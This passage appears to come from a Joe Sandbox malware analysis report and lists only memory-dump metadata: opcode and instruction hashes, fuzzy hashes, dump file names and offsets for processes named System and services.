                                                                                                      • Opcode Fuzzy Hash: 8bf418eeab8bf32c64110ade5bf008c09aa93fb4c3950c2cc2ea13a7c35d5911
                                                                                                      • Instruction Fuzzy Hash: F4111870908A8D8FCF85EF68C858AE97BF0FF29301F0501AAD409D72A1D734D554CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b89c000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a2240eeb96ea7f0a1a5282d337980e4fd46caff3981e171ced985dc2250696a9
                                                                                                      • Instruction ID: 5c9d9785e5d0eab9844f17256971d19535e0a58a8c472a140d0cffbd1156e88a
                                                                                                      • Opcode Fuzzy Hash: a2240eeb96ea7f0a1a5282d337980e4fd46caff3981e171ced985dc2250696a9
                                                                                                      • Instruction Fuzzy Hash: D501B13194E7CD9FEB529BB448650E83FA0EF06205F1641FAD449D70A3DA28568A8301
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2beb80400ec81fa4dba02f30b4851489213b0371d7e814f4cd5cbb2f7830dbff
                                                                                                      • Instruction ID: 7f3048e4bd895ab4526ebf6e30d7d07bdd89ddd000905fa9035f5c838073c8b8
                                                                                                      • Opcode Fuzzy Hash: 2beb80400ec81fa4dba02f30b4851489213b0371d7e814f4cd5cbb2f7830dbff
                                                                                                      • Instruction Fuzzy Hash: 8C018C30909A4D8FCF85EF68C858AEA7BF0FF29300F0505AAD418C71A2CB359590CB80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 37257a170cea4d83a4dd5b24ec02881857826b80a4a77e20aa544bd5df49db9f
                                                                                                      • Instruction ID: b20383424d9a2a59c9c61d087aa88f70244a2a240c266e64648d414a2b71d4c2
                                                                                                      • Opcode Fuzzy Hash: 37257a170cea4d83a4dd5b24ec02881857826b80a4a77e20aa544bd5df49db9f
                                                                                                      • Instruction Fuzzy Hash: 4701407090968C8FCB45DF68C859AD97FF0FF59304F05429BE449C71A2DB349994CB41
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fa322433210d367e362c5b6096575ec6ebdd775bbd157fca8d9b1e5a714cdd9a
                                                                                                      • Instruction ID: 0922f089c5ed2a8709ab9b53b808f032277b571de9d111caa9bee86c4e969cac
                                                                                                      • Opcode Fuzzy Hash: fa322433210d367e362c5b6096575ec6ebdd775bbd157fca8d9b1e5a714cdd9a
                                                                                                      • Instruction Fuzzy Hash: 3D014C3090968D8FCF85EF68C854AAA7BB0FF29300F0505AAD418C71A2DB74DA54CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • Opcode Fuzzy Hash: 2755c16ec20f41fe40a316512840331512b982b14744bd8240b62bc01847b4ea
                                                                                                      • Instruction Fuzzy Hash: 5BF03071E0D51D8EDBE5DB1C88686A9A7E1EF5C311F1142FAD01DD2292DE342AC14F01
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a5000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2cfc3a7b733ecfa26f7c4fe965e52f69aa440e73078b3b4e353da9c351d15b95
                                                                                                      • Instruction ID: f88948cfbad4594ba3a7f5d29056d8bc2707eb500a13a5b222b496bcfb6a5366
                                                                                                      • Opcode Fuzzy Hash: 2cfc3a7b733ecfa26f7c4fe965e52f69aa440e73078b3b4e353da9c351d15b95
                                                                                                      • Instruction Fuzzy Hash: 82F0A77590D68D9FDB61AB64845D2DC7FF0FF15300F4504ABD408C6051D6349294D701
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8aa000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f048aad6020ded2b2e6076d008566569af0403dcd0246a8d3772eb74cee16602
                                                                                                      • Instruction ID: 2236270f766b404bb97735bd3144ba7f8818f5dccf9064b51ea13e9e23b1db24
                                                                                                      • Opcode Fuzzy Hash: f048aad6020ded2b2e6076d008566569af0403dcd0246a8d3772eb74cee16602
                                                                                                      • Instruction Fuzzy Hash: 4BF0CD70E1926E8EEB64CFE684642AD77B1BF5C700F114536D41D561A6CB386A41DF40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b890000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 03ae4ff55aa787ed8873e27ee002dfbd0012796c1baebd836331f96d83155399
                                                                                                      • Instruction ID: 265d20d81750986265ce3abc996874ab48f370d1df73b72f891973469574bacb
                                                                                                      • Opcode Fuzzy Hash: 03ae4ff55aa787ed8873e27ee002dfbd0012796c1baebd836331f96d83155399
                                                                                                      • Instruction Fuzzy Hash: 1EF0C270A0D11A8BEB14DB84C8947F97BB1FF54305F044A3AC425872D2CB786680CB80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b89c000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ab754a36c0b8ef76ade9dae1ad11c6bad2a77e3dc3923b0f49f748857864b744
                                                                                                      • Instruction ID: ea31ba4005094a8fdde5766cd7c0452ad030c10ce67695f3fed31aa2bca88462
                                                                                                      • Opcode Fuzzy Hash: ab754a36c0b8ef76ade9dae1ad11c6bad2a77e3dc3923b0f49f748857864b744
                                                                                                      • Instruction Fuzzy Hash: 6FF0823181E38D8FDF669F24C9655D97FA0FF45300F4501F6E818C61A2DB349554C741
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B896000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B896000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b896000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 99a1b234c08f5143dcc75a673ab5469febbdac9bff146562c9b158fdd3e61d5c
                                                                                                      • Instruction ID: 366f1125a1083300f404b41c1beabdd5241de96ac91596e9fa8487ddce26a593
                                                                                                      • Opcode Fuzzy Hash: 99a1b234c08f5143dcc75a673ab5469febbdac9bff146562c9b158fdd3e61d5c
                                                                                                      • Instruction Fuzzy Hash: C7F0FE70E0991D8AEBA4EB18DC656E97AA1EF84345F1041F6900EDA2D6DE342EC24F41
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b89c000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9e91ab1a3d8cc560ffc7ecc63e0e11d2c099a3ffc24025c52d0581921c500c04
                                                                                                      • Instruction ID: 7280d7c3df9d00c93e02f926697595f3901a82321df49a66352cc7c55827e08d
                                                                                                      • Opcode Fuzzy Hash: 9e91ab1a3d8cc560ffc7ecc63e0e11d2c099a3ffc24025c52d0581921c500c04
                                                                                                      • Instruction Fuzzy Hash: BCE0D83284F28D4BE721675089751E43F50FF06300F4601BAE04C860E2DA28555CC702
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8aa000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8c0cf3644b8d59f491e2f7122078d551f5e5c3f32535519750ab9faa9039ffec
                                                                                                      • Instruction ID: d22b082633dd42d15c11eac5f4a5e284c4295e7f1942939dd70806572af9773a
                                                                                                      • Opcode Fuzzy Hash: 8c0cf3644b8d59f491e2f7122078d551f5e5c3f32535519750ab9faa9039ffec
                                                                                                      • Instruction Fuzzy Hash: 20D0C261F0494F46EB289B84C821ABD2BA2EF14384F410134D42AEA1D9DF2828434740
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a5000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: eb2f8d69e71298ae7768a5ac284c554ba65e54df7ddc4e1c0db2075fb8973d81
                                                                                                      • Instruction ID: 031591ee34833968120a0a0c9e9feb1dd2effdc6e9e6d041cb7c1d8eb68a297a
                                                                                                      • Opcode Fuzzy Hash: eb2f8d69e71298ae7768a5ac284c554ba65e54df7ddc4e1c0db2075fb8973d81
                                                                                                      • Instruction Fuzzy Hash: AED0EC60D09A998BDBA5DB5488747ACA6A4FB18700F0102A9A05DD2282DB341AC08B01
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1b9d076fd340b48b8dfc6a711cd123c70153ccb339c231fa06aa0981d75236c2
                                                                                                      • Instruction ID: 7ed67aa414f6ca703e54c1638fddbceed64c428eaf41d29fb62dbd8dcb6b2cfa
                                                                                                      • Opcode Fuzzy Hash: 1b9d076fd340b48b8dfc6a711cd123c70153ccb339c231fa06aa0981d75236c2
                                                                                                      • Instruction Fuzzy Hash: 20D05EB1E0571D4FEB64EF54848975473A1FF18700F4200A8A44893162DB345911CB00
                                                                                                      • Opcode Fuzzy Hash: 6371bcdc5f63e9ce2fbc70b975fa142f3de41170683f56fa7d8d276b1a53acdc
                                                                                                      • Instruction Fuzzy Hash: 09418F30A15A5D8FEB94EFA8C495AEDBBF1FF58344F00016AD409E72A5DF346841CB50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 823b1c9ab06009fd80e9ff5589387abb40f7db3f76fbf3a72c92927f56920e12
                                                                                                      • Instruction ID: b79b4bf157d622d5dc300065ba99254f3188f73a171105d16d15cd1644b41142
                                                                                                      • Opcode Fuzzy Hash: 823b1c9ab06009fd80e9ff5589387abb40f7db3f76fbf3a72c92927f56920e12
                                                                                                      • Instruction Fuzzy Hash: D4510934E0A91D8EEBB4DB58CC947E9B3B5EB48302F1542F5D00DA22A1DF396AC58F50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 661ea1609c2bb113d3a50a6ef773479683b420660f17b5d9405af96217703732
                                                                                                      • Instruction ID: 8a6af8c2ba7708013c57772e881d558163aef1f41163b8d312a392e9c1d974b2
                                                                                                      • Opcode Fuzzy Hash: 661ea1609c2bb113d3a50a6ef773479683b420660f17b5d9405af96217703732
                                                                                                      • Instruction Fuzzy Hash: 6B216D36B0E2CD8FE71297A8DC211EC7760EF46310F0505B3C058CB1E2DA38260AC7A1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 678eaf3abaab44085f8bf003697cafc9802c769f130e7ec08dac9ea3c485fddf
                                                                                                      • Instruction ID: 2e363c1a0605f991439f9aa534927e01a949ffc0f0aa64aeee0d47dcc529ac9c
                                                                                                      • Opcode Fuzzy Hash: 678eaf3abaab44085f8bf003697cafc9802c769f130e7ec08dac9ea3c485fddf
                                                                                                      • Instruction Fuzzy Hash: F8319C31E0851C9FDB94DF14C895AE973F1FB69301F5041EA900EE32A5DE75AA80CF42
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 70f57b4473e96227db89b495d89924a06c71b94e4bf4cce946b542559e93bfe3
                                                                                                      • Instruction ID: 5d26a46eef1699b78f2f32f10113d4a6b26ccba3916119bb6d1f8d02dc3f23ba
                                                                                                      • Opcode Fuzzy Hash: 70f57b4473e96227db89b495d89924a06c71b94e4bf4cce946b542559e93bfe3
                                                                                                      • Instruction Fuzzy Hash: 3F31BA31E0851C9FCF94DF14C895AE973F0FB69301F5011DA900EE32A5DA75AA84CF42
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d68dbad8db0006350e60ed33d6018e45e82b19b987df855f5c098a7a359f5fce
                                                                                                      • Instruction ID: 26434ffb7b6f35e25a406d449146b1fa075e829a07f7795c0131b84a050dd699
                                                                                                      • Opcode Fuzzy Hash: d68dbad8db0006350e60ed33d6018e45e82b19b987df855f5c098a7a359f5fce
                                                                                                      • Instruction Fuzzy Hash: 83319774D1952D8EFBB4DF54C894BE9B3B1AB58302F1042E9D00DA62A1DF786AC5CF10
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0a5c2c2280e4ded322c8970c26a049caa28013d329fe1d70ff5c6dd1b3315f14
                                                                                                      • Instruction ID: bc344770d7ebd2a75bad634c1fd45aa2784705b7a0a675ab96f558e2a6601101
                                                                                                      • Opcode Fuzzy Hash: 0a5c2c2280e4ded322c8970c26a049caa28013d329fe1d70ff5c6dd1b3315f14
                                                                                                      • Instruction Fuzzy Hash: EA31DA74E1961D8EEB64DF14CC98BE8B3B1AB58306F0542E5D00D962A1DF346AC5CF10
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fe8dada112c5e6a0bae89942d37ed229faedb24934b351be510b11fa555825df
                                                                                                      • Instruction ID: 9feb4f0c22d095a6b03321766a6ff30d2806950d6e3c83ea5c3274f29891ba60
                                                                                                      • Opcode Fuzzy Hash: fe8dada112c5e6a0bae89942d37ed229faedb24934b351be510b11fa555825df
                                                                                                      • Instruction Fuzzy Hash: 5F11E631B1E69E8EE7129B68CC212E97770EF46710F0645B3C058DB1E2DA38660AC7A1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c7250d9bd0a40483058ccdc641c7fae6f44c6b1dc998eb7a4598d227763f342b
                                                                                                      • Instruction ID: 1413ef6e0cc7e8ed0a0699b0ca23813341b168214de5d59779bc07e483d91db2
                                                                                                      • Opcode Fuzzy Hash: c7250d9bd0a40483058ccdc641c7fae6f44c6b1dc998eb7a4598d227763f342b
                                                                                                      • Instruction Fuzzy Hash: 48112331E0E6CE8EE7129B64CC211E97B70EF46710F0645B3C058DB1E2CA386609CBA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4ee542361103f5f809b62e6d8e44c69eea89af796cdd4ad0b2ab92bb2091878f
                                                                                                      • Instruction ID: 19893fce761762b902b041c1fbe5c430712924eec165dac3b5af8ae06e23d43b
                                                                                                      • Opcode Fuzzy Hash: 4ee542361103f5f809b62e6d8e44c69eea89af796cdd4ad0b2ab92bb2091878f
                                                                                                      • Instruction Fuzzy Hash: 9511E571E0E2CE8FE7129B64CC255A97B70EF46700F0545B3D055DB1E2DA386619CBA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f5a049c32d268ba094fc167c5301f872c86694eb2356d6d63843329e00fc06ab
                                                                                                      • Instruction ID: e635c25ddaa138b92bbd8be5fa7551898d725af750dc4f6c11b87ecf201273ad
                                                                                                      • Opcode Fuzzy Hash: f5a049c32d268ba094fc167c5301f872c86694eb2356d6d63843329e00fc06ab
                                                                                                      • Instruction Fuzzy Hash: A8010070E0E2CE8EE7129BA4CC242A97BB0EF06700F0545B3C058DB1E2DA386618C762
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 527401daea785124e93f486b54ac30290e33140114e394638a037a0c0f5f07b6
                                                                                                      • Instruction ID: 60ad955a0b9610ce828db16c15b2108e3513db342963961f59b6b62d13e61180
                                                                                                      • Opcode Fuzzy Hash: 527401daea785124e93f486b54ac30290e33140114e394638a037a0c0f5f07b6
                                                                                                      • Instruction Fuzzy Hash: 13F05430E1961E9FEB90EF68D4596ED77E0FF58705F110437E40CD21A0DA34A2A4CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7f415bfb32078b3233af399303f5822f141042c1c23fbc657de7f55b70bc281b
                                                                                                      • Instruction ID: 98de3e8f416d6d333382c4d4fd7a5252727c78815dd79c9057314aca8e2780f1
                                                                                                      • Opcode Fuzzy Hash: 7f415bfb32078b3233af399303f5822f141042c1c23fbc657de7f55b70bc281b
                                                                                                      • Instruction Fuzzy Hash: 3FF0BD30A1494D9FDF94EF68C448AEA7BE0FF68305F010566F819D3264D730E594CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a3118b78612f35196733d3efac1001af450bfc23f7ea90388fb7bf1402dc6082
                                                                                                      • Instruction ID: c7369c5857161e4e1b8ac83200713f53729f7a097d481b1fdf38d6609910a3d2
                                                                                                      • Opcode Fuzzy Hash: a3118b78612f35196733d3efac1001af450bfc23f7ea90388fb7bf1402dc6082
                                                                                                      • Instruction Fuzzy Hash: 58F05430D1951E9FEB94FF64D4596ED77E0FF18304F010176E41CD21A5DA34A2A0CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b57fd32d69fabe09c8a69e6f4bfa3f6c048901c29123a4572fa243570d179f16
                                                                                                      • Instruction ID: fd641316011508d055f1fcc3132530b8d55b579226e42211e0fc7dc118617d66
                                                                                                      • Opcode Fuzzy Hash: b57fd32d69fabe09c8a69e6f4bfa3f6c048901c29123a4572fa243570d179f16
                                                                                                      • Instruction Fuzzy Hash: 4C01C834E1A52DCEE775DB54C894BE9B3B1AB58302F1542B5C00DA22A1DF386AC58F50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4f8523691c7f9c90781150e69c3189f431e7e05b6b004dcdb40246cc4e073e13
                                                                                                      • Instruction ID: c397b2191a0acab58ec7341348d39b2e8d9d79286c001da99a9ebabc59e6f0ce
                                                                                                      • Opcode Fuzzy Hash: 4f8523691c7f9c90781150e69c3189f431e7e05b6b004dcdb40246cc4e073e13
                                                                                                      • Instruction Fuzzy Hash: 55F03071E0D51D8EEBE5DB5C98686A9A7A1EF5C301F1542FAD01DD2292DE342AC18F01
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 086e00ac1d58f8b804b1333a7f47f61b9fc790fcec526b7e714d21e67944ece6
                                                                                                      • Instruction ID: c95a609b43a6c77c9d1d47f3ceadedfb601b2ca4d899e5f71e357e339dedf958
                                                                                                      • Opcode Fuzzy Hash: 086e00ac1d58f8b804b1333a7f47f61b9fc790fcec526b7e714d21e67944ece6
                                                                                                      • Instruction Fuzzy Hash: 26F0CD30A0921A8BE714DB84C8A43FDB3B1FB54300F040A3AC019932E2CBB86680CB80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 31f2df06c8e85b5071e66afc9c6eb4f688c7d03b621a56ee3973ab20140d2a3f
                                                                                                      • Instruction ID: d69a580e968f998cc98099127803ce24fe74a7fff16f5ca40a9d5c7aeb11fdfa
                                                                                                      • Opcode Fuzzy Hash: 31f2df06c8e85b5071e66afc9c6eb4f688c7d03b621a56ee3973ab20140d2a3f
                                                                                                      • Instruction Fuzzy Hash: 3FF0FE71E059198AE7A4EB18DC656A9B6A1EF84745F1041F6D00D9A2D6DE342E838F40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 185870f866dba72ef698c496ca4866c4b0d4729b629c8123389b10ed4677fda7
                                                                                                      • Instruction ID: 6fbc56a3cd9222dc58950474e575f30b658c65892955520408b81e3b86f36dcd
